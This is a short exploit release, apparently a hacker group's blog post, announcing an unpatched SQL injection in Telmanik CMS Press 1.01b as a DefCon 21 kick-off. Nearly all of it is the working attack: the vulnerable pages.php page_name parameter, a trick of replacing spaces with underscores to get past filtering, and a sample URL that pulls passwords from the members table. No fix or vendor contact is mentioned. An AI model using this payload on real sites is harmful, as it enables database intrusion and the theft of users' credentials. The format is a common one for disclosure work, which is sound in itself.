Telmanik CMS Press 1.01 SQLi 0day

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: SQL Injection
[x] Vendor: www.telmanik.com
[x] Script Name: Telmanik CMS Press
[x] Script Version: 1.01b
[x] Script DL: http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip
[x] Author: Anarchy Angel
[x] Mail : anarchy[at]dc414[dot]org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
http://site.org/themes/pages.php?page_name=[SQLi]

you have to formate you injection like so:
union_select_row_from_table
Replacing spaces with “_”.

Ex:
http://site.org/themes/pages.php?page_name=union_select_password_from_members

This is a special DefCon 21 kick off from me! See ya there 😉

Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny

This entry was posted in CONS, exploit, hacking, release, security. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *